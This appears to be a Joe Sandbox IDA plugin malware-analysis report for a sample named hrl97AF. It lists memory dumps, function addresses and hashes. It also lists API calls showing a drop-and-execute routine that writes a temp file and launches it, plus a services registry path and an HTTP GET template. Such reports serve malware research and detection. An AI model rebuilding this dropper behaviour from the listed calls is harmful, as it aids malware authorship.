Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: lstrcatlstrcpy
String ID: 100200$F7@$SYSTEM\CurrentControlSet\Services\
API String ID: 3905823039-3017750547
Opcode ID: 99f8f17f0a694f6518748ee4b6ac97a82841e6c45d2c058385b64cf9619508e7
Instruction ID: 81adf45cb320d8295d14ce0b174844155e5595c11b4d55a8e5ae176a8c1ac5a8
Opcode Fuzzy Hash: 99f8f17f0a694f6518748ee4b6ac97a82841e6c45d2c058385b64cf9619508e7
Instruction Fuzzy Hash: B5F08231248206BEE750D764DD05FAAB7A8ABD4700F108D3DB2C9A20E0D9B8915D8716

Function 0047F3E7 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000104), ref: 0047F40B

Part of subcall function 0047F426: GetTempFileNameA.KERNEL32(?,0047F422,00000000,?), ref: 0047F427
Part of subcall function 0047F426: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,0047F422,00000000,?), ref: 0047F442
Part of subcall function 0047F426: WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,0047F422,00000000,?), ref: 0047F472
Part of subcall function 0047F426: CloseHandle.KERNEL32(?,00000104,?,00000000,?,0047F422,00000000,?), ref: 0047F47E
Part of subcall function 0047F426: CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,0047F422), ref: 0047F4A2

Memory Dump Source

Source File: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: File$CreateTemp$CloseHandleNamePathProcessWrite
String ID:
API String ID: 3982275768-0
Opcode ID: bf7059baa2945a1e10e6b512662fb3aa47ecbf22e134ef99b631c6adeccb2904
Instruction ID: 6e4a7348b10211cf4712877dfb9ac28625f2a5f97d324a036b6cfd784416edba
Opcode Fuzzy Hash: bf7059baa2945a1e10e6b512662fb3aa47ecbf22e134ef99b631c6adeccb2904
Instruction Fuzzy Hash: 5C2105B1250206BFE7301B20DC4DFEB3B2CEF95711F008129FA4988182D7F59E1586BA

Function 7FE326DF Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000104), ref: 7FE32703

Part of subcall function 7FE3271E: GetTempFileNameA.KERNEL32(?,7FE3271A,00000000,?), ref: 7FE3271F
Part of subcall function 7FE3271E: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,7FE3271A,00000000,?), ref: 7FE3273A
Part of subcall function 7FE3271E: WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,7FE3271A,00000000,?), ref: 7FE3276A
Part of subcall function 7FE3271E: CloseHandle.KERNEL32(?,00000104,?,00000000,?,7FE3271A,00000000,?), ref: 7FE32776
Part of subcall function 7FE3271E: CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,7FE3271A), ref: 7FE3279A

Memory Dump Source

Source File: 00000007.00000002.2043960210.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7fe30000_hrl97AF.jbxd

Similarity

API ID: File$CreateTemp$CloseHandleNamePathProcessWrite
String ID:
API String ID: 3982275768-0
Opcode ID: bf7059baa2945a1e10e6b512662fb3aa47ecbf22e134ef99b631c6adeccb2904
Instruction ID: e8ff87219964215428be11df8a01d81b33858c950305ba854321610fda46bc39
Opcode Fuzzy Hash: bf7059baa2945a1e10e6b512662fb3aa47ecbf22e134ef99b631c6adeccb2904
Instruction Fuzzy Hash: 1621C3B1645306BFE7215B20CC4DFEB7B2CEF86711F404114F94689081E7B1AE15C6A6

Function 009B26DF Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000104), ref: 009B2703

Part of subcall function 009B271E: GetTempFileNameA.KERNEL32(?,009B271A,00000000,?), ref: 009B271F
Part of subcall function 009B271E: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,009B271A,00000000,?), ref: 009B273A
Part of subcall function 009B271E: WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,009B271A,00000000,?), ref: 009B276A
Part of subcall function 009B271E: CloseHandle.KERNEL32(?,00000104,?,00000000,?,009B271A,00000000,?), ref: 009B2776
Part of subcall function 009B271E: CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,009B271A), ref: 009B279A

Memory Dump Source

Source File: 00000007.00000002.2043369977.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_9b0000_hrl97AF.jbxd

Similarity

API ID: File$CreateTemp$CloseHandleNamePathProcessWrite
String ID:
API String ID: 3982275768-0
Opcode ID: bf7059baa2945a1e10e6b512662fb3aa47ecbf22e134ef99b631c6adeccb2904
Instruction ID: bb98266c0c4909428bae064e5a6579769b35f4bb0196a88a69a698cbba0bd75a
Opcode Fuzzy Hash: bf7059baa2945a1e10e6b512662fb3aa47ecbf22e134ef99b631c6adeccb2904
Instruction Fuzzy Hash: EA21E7B1254206BFE7215B20CD8DFEF7B2CDF85721F004118FA4589092EBF1AE15866A

Function 0047F426 Relevance: 7.6, APIs: 5, Instructions: 65fileprocessCOMMON

Download Yara Rule

APIs

GetTempFileNameA.KERNEL32(?,0047F422,00000000,?), ref: 0047F427
CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,0047F422,00000000,?), ref: 0047F442
WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,0047F422,00000000,?), ref: 0047F472
CloseHandle.KERNEL32(?,00000104,?,00000000,?,0047F422,00000000,?), ref: 0047F47E
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,0047F422), ref: 0047F4A2

Memory Dump Source

Source File: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: File$Create$CloseHandleNameProcessTempWrite
String ID:
API String ID: 463619559-0
Opcode ID: 46a42b1a7938ce57373cf3b37306313736b16861edf51c12b33c8459ee93000f
Instruction ID: f6e628fe1b3beb17eff2ae29096c1357e7e40e27f82544d6363832bbd8262412
Opcode Fuzzy Hash: 46a42b1a7938ce57373cf3b37306313736b16861edf51c12b33c8459ee93000f
Instruction Fuzzy Hash: FA116DB1210606FFEB241B20DC4DFEB7A2CEF95B11F008529FA0998080DBF49E1586B9

Function 7FE3271E Relevance: 7.6, APIs: 5, Instructions: 65fileprocessCOMMON

Download Yara Rule

APIs

GetTempFileNameA.KERNEL32(?,7FE3271A,00000000,?), ref: 7FE3271F
CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,7FE3271A,00000000,?), ref: 7FE3273A
WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,7FE3271A,00000000,?), ref: 7FE3276A
CloseHandle.KERNEL32(?,00000104,?,00000000,?,7FE3271A,00000000,?), ref: 7FE32776
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,7FE3271A), ref: 7FE3279A

Memory Dump Source

Source File: 00000007.00000002.2043960210.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7fe30000_hrl97AF.jbxd

Similarity

API ID: File$Create$CloseHandleNameProcessTempWrite
String ID:
API String ID: 463619559-0
Opcode ID: 46a42b1a7938ce57373cf3b37306313736b16861edf51c12b33c8459ee93000f
Instruction ID: 53811a8245002154d32b689494dec5e7fa63c0c5570ca99e0030f64d1e6d62be
Opcode Fuzzy Hash: 46a42b1a7938ce57373cf3b37306313736b16861edf51c12b33c8459ee93000f
Instruction Fuzzy Hash: C91161B1600605BFE7251B20CC4DFEB7A2CEF89B11F404518FA4698480EBF1AE1186A5

Function 009B271E Relevance: 7.6, APIs: 5, Instructions: 65fileprocessCOMMON

Download Yara Rule

APIs

GetTempFileNameA.KERNEL32(?,009B271A,00000000,?), ref: 009B271F
CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,009B271A,00000000,?), ref: 009B273A
WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,009B271A,00000000,?), ref: 009B276A
CloseHandle.KERNEL32(?,00000104,?,00000000,?,009B271A,00000000,?), ref: 009B2776
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,009B271A), ref: 009B279A

Memory Dump Source

Source File: 00000007.00000002.2043369977.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_9b0000_hrl97AF.jbxd

Similarity

API ID: File$Create$CloseHandleNameProcessTempWrite
String ID:
API String ID: 463619559-0
Opcode ID: 46a42b1a7938ce57373cf3b37306313736b16861edf51c12b33c8459ee93000f
Instruction ID: e4fe958aa0864510b1c7d500b69813437f25d16c9c7639d70e6d4f095df6ecff
Opcode Fuzzy Hash: 46a42b1a7938ce57373cf3b37306313736b16861edf51c12b33c8459ee93000f
Instruction Fuzzy Hash: D01184B1210605FFE7241B20CD8DFEF7A2CEF89B11F004518FA1598490EBF0AF1186A9

Function 00403FB1 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100threadCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00404050
ExitThread.KERNEL32 ref: 004040E7

Strings

8@, xrefs: 00403FEC
[@, xrefs: 00404002

Memory Dump Source

Source File: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: CountExitThreadTick
String ID: 8@$[@
API String ID: 2794094058-2583875052
Opcode ID: ff3c58b0bdba37a238cd5a4d168293157beaed9c7ed117d7eea0098dd14a9af2
Instruction ID: 469505ee80aad82e613372910616f7cc737cc72fb2d144b40eece11ab5930af1
Opcode Fuzzy Hash: ff3c58b0bdba37a238cd5a4d168293157beaed9c7ed117d7eea0098dd14a9af2
Instruction Fuzzy Hash: BF31C2715043409BE320EB14DC09B9BB7A5AB84715F04493EF789BB2D1D675A5088B9B

Function 0040499D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 83sleepthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000005,?,00000000), ref: 00404A80
ExitThread.KERNEL32 ref: 00404A8D

Strings

<6@, xrefs: 004049E2
GET %s HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent:Mo, xrefs: 00404A2E

Memory Dump Source

Source File: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
